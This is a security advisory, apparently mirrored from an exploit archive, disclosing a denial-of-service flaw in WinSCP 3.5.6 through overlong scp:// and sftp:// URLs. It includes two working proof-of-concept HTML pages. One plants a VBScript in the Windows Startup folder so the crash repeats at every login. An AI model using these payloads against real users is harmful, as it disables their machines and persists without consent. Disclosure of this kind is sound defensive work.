TUCoPS :: Windows Apps :: hack2162.htm

WinSCP DoS
WinSCP Denial of Service



Package:       WinSCP

Auth:          http://winscp.sourceforge.net 

Version(s):    3.5.6 (maybe also prior versions are vulnerable)

Vulnerability: Denial of Service









What’s WinSCP:



“WinSCP is an open source SFTP (SSH File Transfer Protocol) and

SCP (Secure CoPy) client for Windows using SSH (Secure SHell).

Its main function is safe copying of files between a local and

a remote computer.” 







Vulnerability Description:



A default installation of WinSCP provide the user with 

functionality to handle sftp:// and scp:// addresses. 

The vulnerability exists due to the way the application 

handles long URL’s. A malformed scp:// or sftp:// address 

embedded in a HTML tag cause the WinSCP application to 

exhaust CPU and Memory resources.

The attacker would need the ability to convince the user

to visiting a web site he controlled or opening an HTML 

e-mail he had prepared. During the denial of service, 

WinSCP will not display any GUI.







Goal:



An attacker may use this flaw to prevent the users of attacked

host from working properly.







Pratical Examples:



------ WinSCP_DoS1.html  --------







WinSCP DoS



URL=sftp://AAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">













----------------------------------





-------- WinSCP_DoS2.html  -------





  

  WinSCP DoS

   

    <script language="JScript">



     var WshShell = new ActiveXObject("WScript.Shell");

     strSU = WshShell.SpecialFolders("StartUp");

 

     var fso = new ActiveXObject("Scripting.FileSystemObject");

     var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);

      

     vibas.WriteLine("Dim shell");

     vibas.WriteLine("Dim quote");

     vibas.WriteLine("Dim DoS");

     vibas.WriteLine("Dim param");

     vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");

     vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");

     vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")");

     vibas.WriteLine("quote = Chr(34)");

     vibas.WriteLine("pgm = \"explorer\"");

     vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");

	 

     vibas.Close();

     

    </script>



  





----------------------------------













Credits:

-- 



Luca Ercoli	

Seeweb		http://www.seeweb.com 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH